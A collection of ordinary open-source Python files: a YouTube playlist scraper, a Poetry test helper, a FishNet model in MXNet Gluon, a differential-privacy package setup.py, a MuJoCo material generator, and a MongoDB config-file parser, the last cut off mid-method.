name = " ".join(re.findall(r"[^ ]+", name))
name = remove_punct(name)
self.playlist_name = name
def _is_connection_possible(self):
"""Make a simple request to check if connection is possible.
i:e check if internet is connected.
"""
url = "https://google.com"
try:
requests.get(url)
except requests.exceptions.ConnectionError:
return False
return True
def _check_valid(self, url):
"""Check if the passed URL is valid."""
h = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux \
x86_64; rv:49.0) Gecko/20100101 Firefox/49.0"
}
s = BeautifulSoup(requests.get(url, headers=h).text, "lxml")
t = 'window["ytInitialData"] = '
i = next((i for i in s.find_all("script") if t in str(i)))
i = i.get_text().replace(t, "").replace("\n", "")
i = re.sub(r'^.*"playabilityStatus"', "", i)
i = i.split(",")
status = re.sub(r':|\{|"|status', "", i[0])
if status == "OK":
return True
else:
reason = next((r for r in i if '"reason"' in r))
reason = re.sub(r':|\{|"|reason|simpleText|}', "", reason)
logger.info("Skipping {}: {} {}".format(url, status, reason))
return False
def extract_playlistdata(self):
"""Extract all the videos into YoutubeMetadata objects."""
url_prepend = "https://www.youtube.com/watch?v="
url_base = "https://www.youtube.com"
if not self._is_connection_possible():
logger.warning("Cannot play playlist. No connection detected!")
return "N/A", []
r = requests.get(self.URL)
soup = BeautifulSoup(r.text, "html.parser")
name = soup.findAll("h1", attrs={"class": "pl-header-title"})
self.extract_name(name)
# soup = soup.findAll('tr', attrs={'class': 'pl-video',
# 'class': 'yt-uix-tile'})
logger.debug(len(soup))
# use regex to get video url
# this seems rigid against <div> changes
# so, far this works
links = soup.find_all(
"a", href=re.compile(r".*watch.*") # this regex can be improved in future
)
for link in links:
href = link["href"]
title = link.contents[0]
# If the link is not a video from playlist, there will be no
# 'index' substring. Hence, we can skip this
if "index" not in href:
continue
# Just to make sure the title is not empty. This is done because
# there is always a first link that contains 'index', yet does not
# have a title. This represents the meta-link: a link to playlist
# itself.
title = title.strip()
if not title:
continue
# Get video url using simple algorithm. This 3 index search is done
# just to make sure when youtube playlist url has these query
# params in shuffled order.
slicer = self._get_url_slicer(href)
url = url_base + href[:slicer]
# Check if the video is deleted. Some videos in playlist turn out
# to be deleted videos. We can put a check for that by checking
# if the title is [Deleted video]
# We have a simpler way to check for deleted videos
if title.lower()[1:-1] in self._DELETED:
logger.debug(title.lower()[1:-1])
logger.info("Skipping {}: DELETED/BLOCKED/PRIVATE video.".format(url))
continue
if not self._check_valid(url):
continue
self.list_content_tuple.append(YoutubeMetadata(url, title))
if len(self.list_content_tuple) == 0:
logger.warning(
"Are you sure you have videos in your playlist? Try changing\
privacy to public."
)
self.strip_to_start_end()
def _get_url_slicer(self, url):
slicers = []
strings = ["&index=", "&t=", "&list="]
for s in strings:
try:
slicer = url.index(s)
slicers.append(slicer)
except ValueError:
continue
return min(slicers)
class YoutubePlaylist2(YoutubePlaylist):
"""
Class to store YouTube playlist data.
This uses youtube-dl --flat-playlist command to fetch everything.
This is more robust since we don't have to manually parse everything.
Plus this solves the issue with ajax/scrolling if playlist has more than
100 songs.
"""
def extract_playlistdata(self):
url_prepend = "https://www.youtube.com/watch?v="
url_base = "https://www.youtube.com"
if not self._is_connection_possible():
logger.warning("Cannot play playlist. No connection detected!")
return "N/A", []
# first get playlist name
logger.info(f"Fetching playlist name for [{self.URL}]")
r = requests.get(self.URL)
soup = BeautifulSoup(r.text, "html.parser")
name = soup.findAll("h1", attrs={"class": "pl-header-title"})
self.extract_name(name)
logger.info(f"Playlist name = [{self.playlist_name}]")
logger.info("Fetching songs...")
cmd = f"youtube-dl -j --flat-playlist {self.URL}"
output, errors = exe(cmd)
if not output and errors:
logger.error("Unable to extract playlist")
return "N/A", []
videos = list(map(json.loads, output.split("\n")))
logger.info(f"Found {len(videos)} songs")
for i, video in enumerate(videos):
title = video["title"].strip()
url = video["url"]
url = url_prepend + url
if title.lower()[1:-1] in self._DELETED:
logger.debug(title.lower()[1:-1])
logger.info(f"Skipping [{url}] Possibly DELETED/BLOCKED/PRIVATE video.")
continue
logger.info(f"Checking if [{title}] [{url}] is available")
if not self._check_valid(url):
logger.info("Skipping...")
continue
self.list_content_tuple.append(YoutubeMetadata(url, title))
if len(self.list_content_tuple) == 0:
logger.warning(
"Are you sure you have videos in your playlist? Try changing\
privacy to public."
)
self.strip_to_start_end()
if len(self.list_content_tuple) == 0:
logger.warning(
"Are you sure you have videos in your playlist? Try changing\
privacy to public."
)
self.strip_to_start_end()
def get_data(URL, pl_start, pl_end):
"""Generic function. Should be called only when
it is checked if the URL is a youtube playlist.
Returns a tuple containing the songs and name of
the playlist.
"""
logger.debug("Extracting Playlist Content")
youtube_playlist = YoutubePlaylist2(URL, pl_start, pl_end)
youtube_playlist.extract_playlistdata()
return youtube_playlist.list_content_tuple, youtube_playlist.playlist_name
def main():
url = "https://www.youtube.com/playlist?list=PLwg22VSCR0W6cwuCKUJSkX72xEvYXS0Zx"
print(url)
yp = YoutubePlaylist2(url)
yp.extract_playlistdata()
if __name__ == "__main__":
main()
|
tests/console/commands/self/utils.py | zEdS15B3GCwq/poetry | 7,258 | 12657689 | from __future__ import annotations
from pathlib import Path
from typing import TYPE_CHECKING
from poetry.factory import Factory
if TYPE_CHECKING:
from tomlkit.container import Table as TOMLTable
def get_self_command_dependencies(locked: bool = True) -> TOMLTable:
from poetry.console.commands.self.self_command import SelfCommand
from poetry.locations import CONFIG_DIR
system_pyproject_file = SelfCommand.get_default_system_pyproject_file()
assert system_pyproject_file.exists()
assert system_pyproject_file.parent == Path(CONFIG_DIR)
if locked:
assert system_pyproject_file.parent.joinpath("poetry.lock").exists()
poetry = Factory().create_poetry(system_pyproject_file.parent, disable_plugins=True)
content = poetry.file.read()["tool"]["poetry"]
assert "group" in content
assert SelfCommand.ADDITIONAL_PACKAGE_GROUP in content["group"]
assert "dependencies" in content["group"][SelfCommand.ADDITIONAL_PACKAGE_GROUP]
return content["group"][SelfCommand.ADDITIONAL_PACKAGE_GROUP]["dependencies"]
|
gluon/gluoncv2/models/fishnet.py | naviocean/imgclsmob | 2,649 | 12657701 | """
FishNet for ImageNet-1K, implemented in Gluon.
Original paper: 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
"""
__all__ = ['FishNet', 'fishnet99', 'fishnet150', 'ChannelSqueeze']
import os
from mxnet import cpu
from mxnet.gluon import nn, HybridBlock
from mxnet.gluon.contrib.nn import Identity
from .common import pre_conv1x1_block, pre_conv3x3_block, conv1x1, SesquialteralHourglass, InterpolationBlock
from .preresnet import PreResActivation
from .senet import SEInitBlock
def channel_squeeze(x,
channels_per_group):
"""
Channel squeeze operation.
Parameters:
----------
x : NDArray
Input tensor.
channels_per_group : int
Number of channels per group.
Returns:
-------
NDArray
Resulted tensor.
"""
return x.reshape((0, -4, channels_per_group, -1, -2)).sum(axis=2)
class ChannelSqueeze(HybridBlock):
"""
Channel squeeze layer. This is a wrapper over the same operation. It is designed to save the number of groups.
Parameters:
----------
channels : int
Number of channels.
groups : int
Number of groups.
"""
def __init__(self,
channels,
groups,
**kwargs):
super(ChannelSqueeze, self).__init__(**kwargs)
assert (channels % groups == 0)
self.channels_per_group = channels // groups
def hybrid_forward(self, F, x):
return channel_squeeze(x, self.channels_per_group)
class PreSEAttBlock(HybridBlock):
"""
FishNet specific Squeeze-and-Excitation attention block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
reduction : int, default 16
Squeeze reduction value.
"""
def __init__(self,
in_channels,
out_channels,
bn_use_global_stats,
reduction=16,
**kwargs):
super(PreSEAttBlock, self).__init__(**kwargs)
mid_cannels = out_channels // reduction
with self.name_scope():
self.bn = nn.BatchNorm(
in_channels=in_channels,
use_global_stats=bn_use_global_stats)
self.relu = nn.Activation("relu")
self.conv1 = conv1x1(
in_channels=in_channels,
out_channels=mid_cannels,
use_bias=True)
self.conv2 = conv1x1(
in_channels=mid_cannels,
out_channels=out_channels,
use_bias=True)
self.sigmoid = nn.Activation("sigmoid")
def hybrid_forward(self, F, x):
x = self.bn(x)
x = self.relu(x)
x = F.contrib.AdaptiveAvgPooling2D(x, output_size=1)
x = self.conv1(x)
x = self.relu(x)
x = self.conv2(x)
x = self.sigmoid(x)
return x
class FishBottleneck(HybridBlock):
"""
FishNet bottleneck block for residual unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int
Strides of the convolution.
dilation : int or tuple/list of 2 int
Dilation value for convolution layer.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""
def __init__(self,
in_channels,
out_channels,
strides,
dilation,
bn_use_global_stats,
**kwargs):
super(FishBottleneck, self).__init__(**kwargs)
mid_channels = out_channels // 4
with self.name_scope():
self.conv1 = pre_conv1x1_block(
in_channels=in_channels,
out_channels=mid_channels,
bn_use_global_stats=bn_use_global_stats)
self.conv2 = pre_conv3x3_block(
in_channels=mid_channels,
out_channels=mid_channels,
strides=strides,
padding=dilation,
dilation=dilation,
bn_use_global_stats=bn_use_global_stats)
self.conv3 = pre_conv1x1_block(
in_channels=mid_channels,
out_channels=out_channels,
bn_use_global_stats=bn_use_global_stats)
def hybrid_forward(self, F, x):
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
return x
class FishBlock(HybridBlock):
"""
FishNet block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int, default 1
Strides of the convolution.
dilation : int or tuple/list of 2 int, default 1
Dilation value for convolution layer.
bn_use_global_stats : bool, default False
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
squeeze : bool, default False
Whether to use a channel squeeze operation.
"""
def __init__(self,
in_channels,
out_channels,
strides=1,
dilation=1,
bn_use_global_stats=False,
squeeze=False,
**kwargs):
super(FishBlock, self).__init__(**kwargs)
self.squeeze = squeeze
self.resize_identity = (in_channels != out_channels) or (strides != 1)
with self.name_scope():
self.body = FishBottleneck(
in_channels=in_channels,
out_channels=out_channels,
strides=strides,
dilation=dilation,
bn_use_global_stats=bn_use_global_stats)
if self.squeeze:
assert (in_channels // 2 == out_channels)
self.c_squeeze = ChannelSqueeze(
channels=in_channels,
groups=2)
elif self.resize_identity:
self.identity_conv = pre_conv1x1_block(
in_channels=in_channels,
out_channels=out_channels,
strides=strides,
bn_use_global_stats=bn_use_global_stats)
def hybrid_forward(self, F, x):
if self.squeeze:
identity = self.c_squeeze(x)
elif self.resize_identity:
identity = self.identity_conv(x)
else:
identity = x
x = self.body(x)
x = x + identity
return x
class DownUnit(HybridBlock):
"""
FishNet down unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""
def __init__(self,
in_channels,
out_channels_list,
bn_use_global_stats,
**kwargs):
super(DownUnit, self).__init__(**kwargs)
with self.name_scope():
self.blocks = nn.HybridSequential(prefix="")
for i, out_channels in enumerate(out_channels_list):
self.blocks.add(FishBlock(
in_channels=in_channels,
out_channels=out_channels,
bn_use_global_stats=bn_use_global_stats))
in_channels = out_channels
self.pool = nn.MaxPool2D(
pool_size=2,
strides=2)
def hybrid_forward(self, F, x):
x = self.blocks(x)
x = self.pool(x)
return x
class UpUnit(HybridBlock):
"""
FishNet up unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
dilation : int or tuple/list of 2 int, default 1
Dilation value for convolution layer.
bn_use_global_stats : bool, default False
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""
def __init__(self,
in_channels,
out_channels_list,
dilation=1,
bn_use_global_stats=False,
**kwargs):
super(UpUnit, self).__init__(**kwargs)
with self.name_scope():
self.blocks = nn.HybridSequential(prefix="")
for i, out_channels in enumerate(out_channels_list):
squeeze = (dilation > 1) and (i == 0)
self.blocks.add(FishBlock(
in_channels=in_channels,
out_channels=out_channels,
dilation=dilation,
bn_use_global_stats=bn_use_global_stats,
squeeze=squeeze))
in_channels = out_channels
self.upsample = InterpolationBlock(scale_factor=2, bilinear=False)
def hybrid_forward(self, F, x):
x = self.blocks(x)
x = self.upsample(x)
return x
class SkipUnit(HybridBlock):
"""
FishNet skip connection unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""
def __init__(self,
in_channels,
out_channels_list,
bn_use_global_stats,
**kwargs):
super(SkipUnit, self).__init__(**kwargs)
with self.name_scope():
self.blocks = nn.HybridSequential(prefix="")
for i, out_channels in enumerate(out_channels_list):
self.blocks.add(FishBlock(
in_channels=in_channels,
out_channels=out_channels,
bn_use_global_stats=bn_use_global_stats))
in_channels = out_channels
def hybrid_forward(self, F, x):
x = self.blocks(x)
return x
class SkipAttUnit(HybridBlock):
"""
FishNet skip connection unit with attention block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""
def __init__(self,
in_channels,
out_channels_list,
bn_use_global_stats,
**kwargs):
super(SkipAttUnit, self).__init__(**kwargs)
mid_channels1 = in_channels // 2
mid_channels2 = 2 * in_channels
with self.name_scope():
self.conv1 = pre_conv1x1_block(
in_channels=in_channels,
out_channels=mid_channels1,
bn_use_global_stats=bn_use_global_stats)
self.conv2 = pre_conv1x1_block(
in_channels=mid_channels1,
out_channels=mid_channels2,
use_bias=True,
bn_use_global_stats=bn_use_global_stats)
in_channels = mid_channels2
self.se = PreSEAttBlock(
in_channels=mid_channels2,
out_channels=out_channels_list[-1],
bn_use_global_stats=bn_use_global_stats)
self.blocks = nn.HybridSequential(prefix="")
for i, out_channels in enumerate(out_channels_list):
self.blocks.add(FishBlock(
in_channels=in_channels,
out_channels=out_channels,
bn_use_global_stats=bn_use_global_stats))
in_channels = out_channels
def hybrid_forward(self, F, x):
x = self.conv1(x)
x = self.conv2(x)
w = self.se(x)
x = self.blocks(x)
x = F.broadcast_add(F.broadcast_mul(x, w), w)
return x
class FishFinalBlock(HybridBlock):
"""
FishNet final block.
Parameters:
----------
in_channels : int
Number of input channels.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""
def __init__(self,
in_channels,
bn_use_global_stats,
**kwargs):
super(FishFinalBlock, self).__init__(**kwargs)
mid_channels = in_channels // 2
with self.name_scope():
self.conv1 = pre_conv1x1_block(
in_channels=in_channels,
out_channels=mid_channels,
bn_use_global_stats=bn_use_global_stats)
self.preactiv = PreResActivation(
in_channels=mid_channels,
bn_use_global_stats=bn_use_global_stats)
def hybrid_forward(self, F, x):
x = self.conv1(x)
x = self.preactiv(x)
return x
class FishNet(HybridBlock):
"""
FishNet model from 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
Parameters:
----------
direct_channels : list of list of list of int
Number of output channels for each unit along the straight path.
skip_channels : list of list of list of int
Number of output channels for each skip connection unit.
init_block_channels : int
Number of output channels for the initial unit.
bn_use_global_stats : bool, default False
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
Useful for fine-tuning.
in_channels : int, default 3
Number of input channels.
in_size : tuple of two ints, default (224, 224)
Spatial size of the expected input image.
classes : int, default 1000
Number of classification classes.
"""
def __init__(self,
direct_channels,
skip_channels,
init_block_channels,
bn_use_global_stats=False,
in_channels=3,
in_size=(224, 224),
classes=1000,
**kwargs):
super(FishNet, self).__init__(**kwargs)
self.in_size = in_size
self.classes = classes
depth = len(direct_channels[0])
down1_channels = direct_channels[0]
up_channels = direct_channels[1]
down2_channels = direct_channels[2]
skip1_channels = skip_channels[0]
skip2_channels = skip_channels[1]
with self.name_scope():
self.features = nn.HybridSequential(prefix="")
self.features.add(SEInitBlock(
in_channels=in_channels,
out_channels=init_block_channels,
bn_use_global_stats=bn_use_global_stats))
in_channels = init_block_channels
down1_seq = nn.HybridSequential(prefix="")
skip1_seq = nn.HybridSequential(prefix="")
for i in range(depth + 1):
skip1_channels_list = skip1_channels[i]
if i < depth:
skip1_seq.add(SkipUnit(
in_channels=in_channels,
out_channels_list=skip1_channels_list,
bn_use_global_stats=bn_use_global_stats))
down1_channels_list = down1_channels[i]
down1_seq.add(DownUnit(
in_channels=in_channels,
out_channels_list=down1_channels_list,
bn_use_global_stats=bn_use_global_stats))
in_channels = down1_channels_list[-1]
else:
skip1_seq.add(SkipAttUnit(
in_channels=in_channels,
out_channels_list=skip1_channels_list,
bn_use_global_stats=bn_use_global_stats))
in_channels = skip1_channels_list[-1]
up_seq = nn.HybridSequential(prefix="")
skip2_seq = nn.HybridSequential(prefix="")
for i in range(depth + 1):
skip2_channels_list = skip2_channels[i]
if i > 0:
in_channels += skip1_channels[depth - i][-1]
if i < depth:
skip2_seq.add(SkipUnit(
in_channels=in_channels,
out_channels_list=skip2_channels_list,
bn_use_global_stats=bn_use_global_stats))
up_channels_list = up_channels[i]
dilation = 2 ** i
up_seq.add(UpUnit(
in_channels=in_channels,
out_channels_list=up_channels_list,
dilation=dilation,
bn_use_global_stats=bn_use_global_stats))
in_channels = up_channels_list[-1]
else:
skip2_seq.add(Identity())
down2_seq = nn.HybridSequential(prefix="")
for i in range(depth):
down2_channels_list = down2_channels[i]
down2_seq.add(DownUnit(
in_channels=in_channels,
out_channels_list=down2_channels_list,
bn_use_global_stats=bn_use_global_stats))
in_channels = down2_channels_list[-1] + skip2_channels[depth - 1 - i][-1]
self.features.add(SesquialteralHourglass(
down1_seq=down1_seq,
skip1_seq=skip1_seq,
up_seq=up_seq,
skip2_seq=skip2_seq,
down2_seq=down2_seq))
self.features.add(FishFinalBlock(
in_channels=in_channels,
bn_use_global_stats=bn_use_global_stats))
in_channels = in_channels // 2
self.features.add(nn.AvgPool2D(
pool_size=7,
strides=1))
self.output = nn.HybridSequential(prefix="")
self.output.add(conv1x1(
in_channels=in_channels,
out_channels=classes,
use_bias=True))
self.output.add(nn.Flatten())
def hybrid_forward(self, F, x):
x = self.features(x)
x = self.output(x)
return x
def get_fishnet(blocks,
model_name=None,
pretrained=False,
ctx=cpu(),
root=os.path.join("~", ".mxnet", "models"),
**kwargs):
"""
Create FishNet model with specific parameters.
Parameters:
----------
blocks : int
Number of blocks.
model_name : str or None, default None
Model name for loading pretrained model.
pretrained : bool, default False
Whether to load the pretrained weights for model.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
"""
if blocks == 99:
direct_layers = [[2, 2, 6], [1, 1, 1], [1, 2, 2]]
skip_layers = [[1, 1, 1, 2], [4, 1, 1, 0]]
elif blocks == 150:
direct_layers = [[2, 4, 8], [2, 2, 2], [2, 2, 4]]
skip_layers = [[2, 2, 2, 4], [4, 2, 2, 0]]
else:
raise ValueError("Unsupported FishNet with number of blocks: {}".format(blocks))
direct_channels_per_layers = [[128, 256, 512], [512, 384, 256], [320, 832, 1600]]
skip_channels_per_layers = [[64, 128, 256, 512], [512, 768, 512, 0]]
direct_channels = [[[b] * c for (b, c) in zip(*a)] for a in
([(ci, li) for (ci, li) in zip(direct_channels_per_layers, direct_layers)])]
skip_channels = [[[b] * c for (b, c) in zip(*a)] for a in
([(ci, li) for (ci, li) in zip(skip_channels_per_layers, skip_layers)])]
init_block_channels = 64
net = FishNet(
direct_channels=direct_channels,
skip_channels=skip_channels,
init_block_channels=init_block_channels,
**kwargs)
if pretrained:
if (model_name is None) or (not model_name):
raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")
from .model_store import get_model_file
net.load_parameters(
filename=get_model_file(
model_name=model_name,
local_model_store_dir_path=root),
ctx=ctx)
return net
def fishnet99(**kwargs):
"""
FishNet-99 model from 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
"""
return get_fishnet(blocks=99, model_name="fishnet99", **kwargs)
def fishnet150(**kwargs):
"""
FishNet-150 model from 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
"""
return get_fishnet(blocks=150, model_name="fishnet150", **kwargs)
def _test():
import numpy as np
import mxnet as mx
pretrained = False
models = [
fishnet99,
fishnet150,
]
for model in models:
net = model(pretrained=pretrained)
ctx = mx.cpu()
if not pretrained:
net.initialize(ctx=ctx)
# net.hybridize()
net_params = net.collect_params()
weight_count = 0
for param in net_params.values():
if (param.shape is None) or (not param._differentiable):
continue
weight_count += np.prod(param.shape)
print("m={}, {}".format(model.__name__, weight_count))
assert (model != fishnet99 or weight_count == 16628904)
assert (model != fishnet150 or weight_count == 24959400)
x = mx.nd.zeros((1, 3, 224, 224), ctx=ctx)
y = net(x)
assert (y.shape == (1, 1000))
if __name__ == "__main__":
_test()
|
learning/setup.py | dibakch/differential-privacy | 2,550 | 12657704 | <reponame>dibakch/differential-privacy<gh_stars>1000+
# Copyright 2021 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Setup for DP Learning package."""
import os
import setuptools
here = os.path.dirname(os.path.abspath(__file__))
def _parse_requirements(path):
"""Parses requirements from file."""
with open(os.path.join(here, path)) as f:
return [line.rstrip() for line in f] + ["dp-accounting"]
setuptools.setup(
name="dp-learning",
author="Google Differential Privacy Team",
author_email="<EMAIL>",
description="Differential privacy learning algorithms",
long_description_content_type="text/markdown",
url="https://github.com/google/differential-privacy/",
packages=setuptools.find_packages(),
install_requires=_parse_requirements("requirements.txt"),
classifiers=[
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Software Development :: Libraries :: Python Modules",
],
python_requires=">=3.7",
license="Apache 2.0",
keywords="differential-privacy clustering",
)
|
envs/hns/mujoco-worldgen/mujoco_worldgen/objs/material.py | jiayu-ch15/curriculum | 424 | 12657755 | import numpy as np
import hashlib
from collections import OrderedDict
from mujoco_worldgen.objs.obj import Obj
from mujoco_worldgen.util.types import store_args
class Material(Obj):
placeable = False
@store_args
def __init__(self,
random=True,
rgba=None,
texture=None,
texture_type=None,
grid_layout=None,
grid_size=None):
super(Material, self).__init__()
def generate(self, random_state, world_params, placement_size=None):
if not world_params.randomize_material:
deterministic_seed = int(hashlib.sha1(
self.name.encode()).hexdigest(), 16)
random_state = np.random.RandomState(deterministic_seed % 100000)
choice = random_state.randint(0, 3)
self.xml_dict = None
if self.texture is not None:
self.xml_dict = self._material_texture(
random_state, self.texture, self.texture_type,
self.grid_layout, self.grid_size, self.rgba)
elif self.rgba is not None:
self.xml_dict = self._material_rgba(random_state, self.rgba)
elif self.xml_dict is None:
self.xml_dict = [self._material_rgba,
self._material_checker,
self._material_random][choice](random_state)
self.xml_dict = OrderedDict(asset=self.xml_dict)
def generate_xml_dict(self):
return self.xml_dict
def _material_rgba(self, random_state, rgba=None):
material_attrs = OrderedDict([('@name', self.name),
('@specular', 0.1 + 0.2 *
random_state.uniform()),
('@shininess', 0.1 + 0.2 *
random_state.uniform()),
('@reflectance', 0.1 + 0.2 * random_state.uniform())])
if rgba is None:
material_attrs['@rgba'] = 0.1 + 0.8 * random_state.uniform(size=4)
material_attrs['@rgba'][3] = 1.0
elif isinstance(rgba, tuple) and len(rgba) == 2:
material_attrs['@rgba'] = random_state.uniform(rgba[0], rgba[1])
else:
material_attrs['@rgba'] = rgba
return OrderedDict(material=[material_attrs])
def _material_checker(self, random_state):
texture_attr = OrderedDict([('@name', "texture_" + self.name),
('@builtin', 'checker'),
('@height', random_state.randint(5, 100)),
('@width', random_state.randint(5, 100)),
('@type', '2d'),
('@rgb1', [0, 0, 0])])
texture_attr['@rgb2'] = 0.1 + 0.8 * random_state.uniform(size=3)
xml_dict = OrderedDict(texture=[texture_attr])
texrepeat = [random_state.randint(
5, 100), random_state.randint(5, 100)]
xml_dict["material"] = [OrderedDict([('@name', self.name),
('@texrepeat', texrepeat),
('@texture', "texture_" + self.name)])]
return xml_dict
def _material_random(self, random_state):
random = 0.1 + 0.8 * random_state.uniform()
texture_attr = OrderedDict([('@name', "texture_" + self.name),
('@builtin', 'flat'),
('@mark', 'random'),
('@type', '2d'),
('@height', 2048),
('@width', 2048),
('@rgb1', [1, 1, 1]),
('@rgb2', [1, 1, 1]),
('@random', random)])
material = OrderedDict([('@name', self.name),
('@texture', "texture_" + self.name)])
xml_dict = OrderedDict([('texture', [texture_attr]),
('material', [material])])
return xml_dict
def _material_texture(self, random_state, texture, texture_type=None,
grid_layout=None, grid_size=None, rgba=None):
texture_attr = OrderedDict([
('@name', "texture_" + self.name),
('@type', '2d'),
('@builtin', 'none'),
('@file', texture),
])
if texture_type is None:
texture_type = "cube"
texture_attr["@type"] = texture_type
if texture_type == "cube":
texture_attr["@gridlayout"] = '.U..LFRB.D..' if grid_layout is None else grid_layout
texture_attr["@gridsize"] = '3 4' if grid_size is None else grid_size
material = OrderedDict([
('@name', self.name),
('@texture', "texture_" + self.name),
])
if rgba is not None:
material['@rgba'] = rgba
return OrderedDict([
('texture', [texture_attr]),
('material', [material]),
])
|
insights/parsers/mongod_conf.py | maxamillion/insights-core | 121 | 12657771 | """
MongodbConf - files - Configuration files for MongoDB
=====================================================
This module contains the following files:
``/etc/mongod.conf``,
``/etc/mongodb.conf`` ,
``/etc/opt/rh/rh-mongodb26/mongod.conf``
``/etc/opt/rh/rh-mongodb34/mongod.conf``
They are provided by package mongodb-server, rh-mongodb26-mongodb-server or
rh-mongodb34-mongodb-server.
These MongoDB configuration files may use the **YAML** format
or the standard **key-value pair** format.
Sample input(YAML format)::
systemLog:
destination: file
logAppend: true
path: /var/log/mongodb/mongod.log
# Where and how to store data.
storage:
dbPath: /var/lib/mongo
journal:
enabled: true
Sample input(key-value pair format)::
# mongodb.conf - generated from Puppet
#where to log
logpath=/var/log/mongodb/mongodb.log
logappend=true
# Set this option to configure the mongod or mongos process to bind to and
# listen for connections from applications on this address.
# You may concatenate a list of comma separated values to bind mongod to multiple IP addresses.
bind_ip = 127.0.0.1
# fork and run in background
fork=true
dbpath=/var/lib/mongodb
# location of pidfile
pidfilepath=/var/run/mongodb/mongodb.pid
# Enables journaling
journal = true
# Turn on/off security. Off is currently the default
noauth=true
Examples:
>>> mongod_conf1 = shared[MongodConf]
>>> mongod_conf2 = shared[MongodConf]
>>> MongodbConf1.is_yaml
True
>>> MongodbConf2.is_yaml
False
>>> mongod_conf1.fork
True
>>> mongod_conf2.fork
'true'
>>> mongod_conf1.dbpath
'/var/lib/mongo'
>>> mongod_conf2.dbpath
'/var/lib/mongo'
>>> mongod_conf1.get("systemlog", {}).get("logAppend")
True
>>> MongodbConf2.get("logappend")
'true'
"""
import yaml
from .. import parser, Parser, LegacyItemAccess, get_active_lines
from ..parsers import ParseException, split_kv_pairs
from ..specs import Specs
@parser(Specs.mongod_conf)
class MongodbConf(Parser, LegacyItemAccess):
"""
Parse the ``/etc/mongod.conf`` config file in key-value pair or YAML format.
Make several frequently used config options as properties.
Raises:
ParseException: Raised when any problem parsing the file content.
Attributes:
is_yaml (boolean): True if this is a yaml format file.
"""
def parse_content(self, content):
a_content = get_active_lines(content)
if not a_content:
raise ParseException("mongod.conf is empty or all lines are comments")
self.is_yaml = self._file_type_is_yaml(a_content)
try:
if self.is_yaml:
self.data = yaml.safe_load('\n'.join(content))
else:
self.data = split_kv_pairs(content, use_partition=True)
except Exception as e:
raise ParseException('mongod conf parse failed: %s', e)
def _file_type_is_yaml(self, content):
"""
Return True if the file type is YAML.
Return False means this file will be handled in key-value pair format.
Why 0.9?
The normal key-value pair format file would always has the '='
in each line. Use 0.9 rather than 1 here, just in case there're
any unexpected lines with wrong settings.
"""
cnt = sum([1 for line in content if "=" in line])
percent = float(cnt) / len(content)
return True if percent < 0.9 else False
@property
def bindip(self):
"""
Return option value of `net.bindIp` if a yaml conf and `bind_ip` if a
key-value pair conf.
"""
if self.is_yaml:
return self.get('net', {}).get('bindIp')
else:
return self.get('bind_ip')
@property
def port(self):
"""
Return option value of `net.port` if a yaml conf and `port` if a
key-value pair conf.
"""
if self.is_yaml:
return self.get('net', {}).get('port')
else:
return self.get('port')
@property
def dbpath(self):
"""
Return option value of `storage.dbPath` if a yaml conf and `dbPath`
if a key-value pair conf.
"""
if self.is_yaml:
return self.get('storage', {}).get('dbPath') or self.get('storage.dbPath')
else:
return self.get('dbpath')
@property
def fork(self):
"""
Return option value of `processManagement.fork` if a yaml conf and
`fork` if a key-value pair conf.
"""
if self.is_yaml:
return self.get('processManagement', {}).get('fork')
else:
return self.get('fork')
@property
def pidfilepath(self):
"""
